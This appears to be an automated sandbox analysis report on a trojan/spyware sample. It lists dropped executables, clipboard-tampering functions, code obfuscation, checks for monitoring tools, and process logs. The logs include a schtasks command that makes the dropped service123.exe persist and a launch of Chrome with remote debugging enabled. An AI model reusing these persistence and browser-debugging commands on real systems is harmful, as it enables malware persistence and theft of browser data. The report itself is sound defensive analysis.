Source: chrome.exe, 00000004.00000002.2124217762.0000661800E54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=
Source: chrome.exe, 00000004.00000002.2121192542.0000661800724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2120583185.00006618005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2110876193.0000661800C10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108837351.0000661800C10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2122687339.0000661800C10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2120291725.00006618004F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000004.00000002.2120291725.00006618004F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icof
Source: chrome.exe, 00000004.00000003.2110876193.0000661800C10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108837351.0000661800C10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2122687339.0000661800C10000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoxtension
Source: chrome.exe, 00000004.00000002.2120201684.00006618004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000004.00000002.2122246127.0000661800A80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000004.00000002.2118559384.000066180000C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000004.00000002.2119243982.000066180020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000004.00000002.2119243982.000066180020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000004.00000002.2120583185.00006618005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2119243982.000066180020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000004.00000002.2121617333.0000661800874000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2119243982.000066180020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000004.00000002.2120201684.00006618004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000004.00000002.2120737246.0000661800629000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2098421462.000066180061C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000004.00000002.2120737246.0000661800629000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2098421462.000066180061C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000004.00000002.2120737246.0000661800629000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2098421462.000066180061C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000004.00000002.2119456616.00006618002D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2120737246.0000661800629000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2098421462.000066180061C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0C9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_6C0C9C22
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0C9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_6C0C9C22
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0C9D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_6C0C9D11
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0C9E27 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 8_2_6C0C9E27

System Summary
barindex
Drops large PE files
Source: C:\Users\user\Desktop\file.exe File dump: service123.exe.0.dr 314617856 Jump to dropped file
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\file.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00AA34AF 0_3_00AA34AF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00AA366B 0_3_00AA366B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00AA3B54 0_3_00AA3B54
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_008C51B0 8_2_008C51B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_008C3E20 8_2_008C3E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F2CCE 8_2_6C0F2CCE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0BCD00 8_2_6C0BCD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0BEE50 8_2_6C0BEE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0C0FC0 8_2_6C0C0FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1749A0 8_2_6C1749A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C100AC0 8_2_6C100AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0C44F0 8_2_6C0C44F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F46E0 8_2_6C0F46E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E87C0 8_2_6C0E87C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F07D0 8_2_6C0F07D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C100060 8_2_6C100060
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F2090 8_2_6C0F2090
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E2360 8_2_6C0E2360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C10DC70 8_2_6C10DC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0C5880 8_2_6C0C5880
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E98F0 8_2_6C0E98F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F7A20 8_2_6C0F7A20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0FDBEE 8_2_6C0FDBEE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F140E 8_2_6C0F140E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C101510 8_2_6C101510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0FF610 8_2_6C0FF610
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0DF760 8_2_6C0DF760
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0B3000 8_2_6C0B3000
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1750D0 8_2_6C1750D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0C70C0 8_2_6C0C70C0
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\service123.exe 05466AC3A1F09726E552D0CBF3BAC625A7EB7944CEDF812F60B066DCBD74AFB1
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C183B20 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C17ADB0 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1836E0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C183820 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C185A70 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C183560 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C185980 appears 83 times
One or more processes crash
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 1820
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: file.exe Static PE information: Section: mcmnjdbh ZLIB complexity 0.994276159203103
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@20/7@10/4
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\DGdQGkLyQR Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\JStVXPURjEhqLJtWBhCN
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7004
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 00000004.00000002.2121036807.00006618006EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: file.exe ReversingLabs: Detection: 44%
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2548 --field-trial-handle=2504,i,7512998509247764388,4904351507953880072,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 1820
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2548 --field-trial-handle=2504,i,7512998509247764388,4904351507953880072,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll Jump to behavior
Source: file.exe Static file information: File size 4417024 > 1048576
Source: file.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x277800
Source: file.exe Static PE information: Raw size of mcmnjdbh is bigger than: 0x100000 < 0x1bb200
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_008C8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 8_2_008C8230
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: file.exe Static PE information: real checksum: 0x437635 should be: 0x437e07
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: mcmnjdbh
Source: file.exe Static PE information: section name: hqiwbric
Source: file.exe Static PE information: section name: .taggant
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: unmYCIPOHmXNjqOesrEy.dll.0.dr Static PE information: section name: .eh_fram
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A449C9 push 004AAB1Ch; ret 0_3_00A44CB5
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A9F794 push ecx; retn 0000h 0_3_00A9F795
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_008CA521 push es; iretd 8_2_008CA694
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C160C30 push eax; mov dword ptr [esp], edi 8_2_6C160DAA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C12ED10 push eax; mov dword ptr [esp], ebx 8_2_6C12EE33
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C104E31 push eax; mov dword ptr [esp], ebx 8_2_6C104E45
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F8E7A push edx; mov dword ptr [esp], ebx 8_2_6C0F8E8E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0FA947 push eax; mov dword ptr [esp], ebx 8_2_6C0FA95B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C12EAB0 push eax; mov dword ptr [esp], ebx 8_2_6C12EBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C118AA0 push eax; mov dword ptr [esp], ebx 8_2_6C11909F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C100AA2 push eax; mov dword ptr [esp], ebx 8_2_6C100AB6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C102AAC push edx; mov dword ptr [esp], ebx 8_2_6C102AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C132BF0 push eax; mov dword ptr [esp], ebx 8_2_6C132F24
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C132BF0 push edx; mov dword ptr [esp], ebx 8_2_6C132F43
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F8435 push edx; mov dword ptr [esp], ebx 8_2_6C0F8449
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C118460 push eax; mov dword ptr [esp], ebx 8_2_6C118A5F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F048B push eax; mov dword ptr [esp], ebx 8_2_6C0F04A1
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F04E0 push eax; mov dword ptr [esp], ebx 8_2_6C0F06DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0D1CFA push eax; mov dword ptr [esp], ebx 8_2_6C186622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0D1CFA push eax; mov dword ptr [esp], ebx 8_2_6C186622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0FA5A7 push eax; mov dword ptr [esp], ebx 8_2_6C0FA5BB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C132620 push eax; mov dword ptr [esp], ebx 8_2_6C132954
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C132620 push edx; mov dword ptr [esp], ebx 8_2_6C132973
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1406B0 push eax; mov dword ptr [esp], ebx 8_2_6C140A4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F06A6 push eax; mov dword ptr [esp], ebx 8_2_6C0F06DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F06A2 push eax; mov dword ptr [esp], ebx 8_2_6C0F06DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F06FD push eax; mov dword ptr [esp], ebx 8_2_6C0F06DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F66F3 push edx; mov dword ptr [esp], ebx 8_2_6C0F6707
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F070E push eax; mov dword ptr [esp], ebx 8_2_6C0F06DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0FA777 push eax; mov dword ptr [esp], ebx 8_2_6C0FA78B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C100042 push eax; mov dword ptr [esp], ebx 8_2_6C100056
Source: file.exe Static PE information: section name: mcmnjdbh entropy: 7.9555325792690255
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\unmYCIPOHmXNjqOesrEy.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
